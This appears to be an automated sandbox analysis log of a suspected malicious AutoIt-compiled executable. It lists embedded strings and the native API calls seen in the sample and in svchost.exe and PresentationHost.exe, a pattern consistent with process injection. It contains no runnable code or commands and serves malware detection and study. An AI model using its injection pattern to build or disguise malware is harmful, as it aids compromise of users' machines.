Source: nJ8mJTmMf0.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_09d7f7ca-c
Source: nJ8mJTmMf0.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_6dae6a55-d
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042B083 NtClose, 1_2_0042B083
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272B60 NtClose,LdrInitializeThunk, 1_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk, 1_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03274340 NtSetContextThread, 1_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03274650 NtSuspendThread, 1_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272BA0 NtEnumerateValueKey, 1_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272B80 NtQueryInformationFile, 1_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272BE0 NtQueryValueKey, 1_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272BF0 NtAllocateVirtualMemory, 1_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272AB0 NtWaitForSingleObject, 1_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272AF0 NtWriteFile, 1_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272AD0 NtReadFile, 1_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272F30 NtCreateSection, 1_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272F60 NtCreateProcessEx, 1_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272FA0 NtQuerySection, 1_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272FB0 NtResumeThread, 1_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272F90 NtProtectVirtualMemory, 1_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272FE0 NtCreateFile, 1_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272E30 NtWriteVirtualMemory, 1_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272EA0 NtAdjustPrivilegesToken, 1_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272E80 NtReadVirtualMemory, 1_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272EE0 NtQueueApcThread, 1_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272D30 NtUnmapViewOfSection, 1_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272D00 NtSetInformationFile, 1_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272D10 NtMapViewOfSection, 1_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272DB0 NtEnumerateKey, 1_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272DD0 NtDelayExecution, 1_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272C00 NtQueryInformationProcess, 1_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272C60 NtCreateKey, 1_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272C70 NtFreeVirtualMemory, 1_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272CA0 NtQueryInformationToken, 1_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272CF0 NtOpenProcess, 1_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03272CC0 NtQueryVirtualMemory, 1_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273010 NtOpenDirectoryObject, 1_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273090 NtSetValueKey, 1_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032739B0 NtGetContextThread, 1_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273D10 NtOpenProcessToken, 1_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03273D70 NtOpenThread, 1_2_03273D70
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F54650 NtSuspendThread,LdrInitializeThunk, 6_2_04F54650
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F54340 NtSetContextThread,LdrInitializeThunk, 6_2_04F54340
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_04F52CA0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_04F52C70
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52C60 NtCreateKey,LdrInitializeThunk, 6_2_04F52C60
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_04F52DF0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52DD0 NtDelayExecution,LdrInitializeThunk, 6_2_04F52DD0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52D30 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_04F52D30
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52D10 NtMapViewOfSection,LdrInitializeThunk, 6_2_04F52D10
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52EE0 NtQueueApcThread,LdrInitializeThunk, 6_2_04F52EE0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52E80 NtReadVirtualMemory,LdrInitializeThunk, 6_2_04F52E80
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52FE0 NtCreateFile,LdrInitializeThunk, 6_2_04F52FE0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52FB0 NtResumeThread,LdrInitializeThunk, 6_2_04F52FB0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52F30 NtCreateSection,LdrInitializeThunk, 6_2_04F52F30
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52AF0 NtWriteFile,LdrInitializeThunk, 6_2_04F52AF0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52AD0 NtReadFile,LdrInitializeThunk, 6_2_04F52AD0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_04F52BF0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52BE0 NtQueryValueKey,LdrInitializeThunk, 6_2_04F52BE0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52BA0 NtEnumerateValueKey,LdrInitializeThunk, 6_2_04F52BA0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52B60 NtClose,LdrInitializeThunk, 6_2_04F52B60
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F535C0 NtCreateMutant,LdrInitializeThunk, 6_2_04F535C0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F539B0 NtGetContextThread,LdrInitializeThunk, 6_2_04F539B0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52CF0 NtOpenProcess, 6_2_04F52CF0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52CC0 NtQueryVirtualMemory, 6_2_04F52CC0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52C00 NtQueryInformationProcess, 6_2_04F52C00
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52DB0 NtEnumerateKey, 6_2_04F52DB0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52D00 NtSetInformationFile, 6_2_04F52D00
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52EA0 NtAdjustPrivilegesToken, 6_2_04F52EA0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52E30 NtWriteVirtualMemory, 6_2_04F52E30
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52FA0 NtQuerySection, 6_2_04F52FA0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52F90 NtProtectVirtualMemory, 6_2_04F52F90
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52F60 NtCreateProcessEx, 6_2_04F52F60
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52AB0 NtWaitForSingleObject, 6_2_04F52AB0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F52B80 NtQueryInformationFile, 6_2_04F52B80
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F53090 NtSetValueKey, 6_2_04F53090
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F53010 NtOpenDirectoryObject, 6_2_04F53010
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F53D70 NtOpenThread, 6_2_04F53D70
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F53D10 NtOpenProcessToken, 6_2_04F53D10
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B27BA0 NtCreateFile, 6_2_00B27BA0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B27DE0 NtDeleteFile, 6_2_00B27DE0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B27D00 NtReadFile, 6_2_00B27D00
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B27E70 NtClose, 6_2_00B27E70
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B27FC0 NtAllocateVirtualMemory, 6_2_00B27FC0
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00664021: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00664021
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00658858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00658858
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_0066545F
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0060E800 0_2_0060E800
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062DBB5 0_2_0062DBB5
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0060E060 0_2_0060E060
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0068804A 0_2_0068804A
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00614140 0_2_00614140
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00622405 0_2_00622405
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00636522 0_2_00636522
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00680665 0_2_00680665
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0063267E 0_2_0063267E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00616843 0_2_00616843
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062283A 0_2_0062283A
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006389DF 0_2_006389DF
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00618A0E 0_2_00618A0E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00680AE2 0_2_00680AE2
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00636A94 0_2_00636A94
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0065EB07 0_2_0065EB07
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00668B13 0_2_00668B13
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062CD61 0_2_0062CD61
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00637006 0_2_00637006
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0061710E 0_2_0061710E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00613190 0_2_00613190
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00601287 0_2_00601287
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006233C7 0_2_006233C7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062F419 0_2_0062F419
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006216C4 0_2_006216C4
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00615680 0_2_00615680
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006158C0 0_2_006158C0
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006278D3 0_2_006278D3
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00621BB8 0_2_00621BB8
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00639D05 0_2_00639D05
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0060FE40 0_2_0060FE40
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062BFE6 0_2_0062BFE6
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00621FD0 0_2_00621FD0
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_03943620 0_2_03943620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402200 1_2_00402200
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402A30 1_2_00402A30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042D493 1_2_0042D493
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FD43 1_2_0040FD43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041662E 1_2_0041662E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416633 1_2_00416633
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FF63 1_2_0040FF63
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040DFE3 1_2_0040DFE3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402FA0 1_2_00402FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FA352 1_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E3F0 1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033003E6 1_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C02C0 1_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230100 1_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DA118 1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C8158 1_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F41A2 1_2_032F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033001AA 1_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F81CC 1_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D2000 1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240770 1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03264750 1_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323C7C0 1_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325C6E0 1_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240535 1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03300591 1_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E4420 1_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F2446 1_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EE4F6 1_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FAB40 1_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F6BD7 1_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03256962 1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0330A9A6 1_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324A840 1_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03242840 1_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032268B8 1_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E8F0 1_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03282F28 1_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03260F30 1_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E2F30 1_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B4F40 1_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BEFA0 1_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03232FC8 1_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FEE26 1_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240E59 1_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252E90 1_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FCE93 1_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FEEDB 1_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324AD00 1_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DCD1F 1_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03258DBF 1_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323ADE0 1_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240C00 1_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0CB5 1_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230CF2 1_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F132D 1_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322D34C 1_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0328739A 1_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032452A0 1_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E12ED 1_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325D2F0 1_2_0325D2F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325B2C0 1_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0327516C 1_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322F172 1_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0330B16B 1_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324B1B0 1_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F70E9 1_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FF0E0 1_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EF0CC 1_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032470C0 1_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FF7B0 1_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03285630 1_2_03285630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F16CC 1_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F7571 1_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DD5B0 1_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033095C3 1_2_033095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FF43F 1_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03231460 1_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FFB76 1_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325FB80 1_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B5BF0 1_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0327DBF9 1_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B3A6C 1_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FFA49 1_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F7A46 1_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DDAAC 1_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03285AA0 1_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E1AA3 1_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EDAC6 1_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D5910 1_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03249950 1_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325B950 1_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AD800 1_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032438E0 1_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FFF09 1_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FFFB1 1_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03241F92 1_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03203FD2 1_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03203FD5 1_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03249EB0 1_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F7D73 1_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03243D40 1_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F1D5A 1_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325FDC0 1_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B9C32 1_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FFCF2 1_2_032FFCF2
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082F00B7 3_2_082F00B7
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082F00B2 3_2_082F00B2
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082E99E7 3_2_082E99E7
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082E7A67 3_2_082E7A67
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082EE597 3_2_082EE597
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_08306F17 3_2_08306F17
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082E97C7 3_2_082E97C7
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FCE4F6 6_2_04FCE4F6
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD2446 6_2_04FD2446
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FC4420 6_2_04FC4420
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FE0591 6_2_04FE0591
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F20535 6_2_04F20535
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F3C6E0 6_2_04F3C6E0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F1C7C0 6_2_04F1C7C0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F20770 6_2_04F20770
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F44750 6_2_04F44750
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FB2000 6_2_04FB2000
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD81CC 6_2_04FD81CC
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FE01AA 6_2_04FE01AA
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD41A2 6_2_04FD41A2
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FA8158 6_2_04FA8158
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FBA118 6_2_04FBA118
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F10100 6_2_04F10100
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FA02C0 6_2_04FA02C0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FC0274 6_2_04FC0274
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F2E3F0 6_2_04F2E3F0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FE03E6 6_2_04FE03E6
